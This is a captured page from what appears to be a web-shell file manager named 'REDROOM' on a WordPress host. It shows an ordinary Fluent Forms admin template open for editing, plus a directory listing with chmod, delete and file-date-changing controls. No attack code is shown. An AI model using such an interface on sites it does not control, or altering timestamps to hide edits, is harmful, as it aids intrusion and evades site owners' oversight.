REDROOM
PHP 8.0.30
Path:
Logout
Edit File
Size: 1.76 KB
Close
/home/certprox/zang.certproxywizard.com/wp/wp-content/plugins/fluentform/app/Views/admin/menu-old.php
Text
Base64
<div id="<?php echo $slug; ?>-app" class="warp fconnector_app"> <div class="fframe_app"> <div class="fframe_main-menu-items"> <div class="menu_logo_holder"> <a href="<?php echo esc_url($baseUrl); ?>"> <img style="max-height: 40px;" src="<?php echo esc_url($logo); ?>" /> <span><?php _e('beta', 'fluentform'); ?></span> </a> </div> <div class="fframe_handheld"><span class="dashicons dashicons-menu-alt3"></span></div> <ul class="fframe_menu"> <?php foreach ($menuItems as $item): ?> <?php $hasSubMenu = !empty($item['sub_items']); ?> <li data-key="<?php echo esc_attr($item['key']); ?>" class="fframe_menu_item <?php echo ($hasSubMenu) ? 'fframe_has_sub_items' : ''; ?> fframe_item_<?php echo esc_attr($item['key']); ?>"> <a class="fframe_menu_primary" href="<?php echo esc_url($item['permalink']); ?>"> <?php echo sanitize_text_field($item['label']); ?> <?php if($hasSubMenu){ ?> <span class="dashicons dashicons-arrow-down-alt2"></span> <?php } ?></a> <?php if($hasSubMenu): ?> <div class="fframe_submenu_items"> <?php foreach ($item['sub_items'] as $sub_item): ?> <a href="<?php echo esc_url($sub_item['permalink']); ?>"><?php echo esc_attr($sub_item['label']); ?></a> <?php endforeach; ?> </div> <?php endif; ?> </li> <?php endforeach; ?> </ul> </div> <div class="fframe_body"> <div id="fluent-framework-app" class="fs_route_wrapper"></div> </div> </div> </div>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 8 × Files: 7
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
addons
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
docs
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
form
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
globalSettings
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
notices
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
reports
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
smtp
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
tools
DIR
-
drwxr-xr-x
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
all_entries.php
2.42 KB
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
all_forms.php
2.36 KB
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
global_menu.php
6.70 KB
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
index.php
26 B
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
menu-old.php
1.76 KB
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
menu.php
162 B
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
no_permission.php
1.03 KB
lrw-r--r--
2026-03-30 10:23:25
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).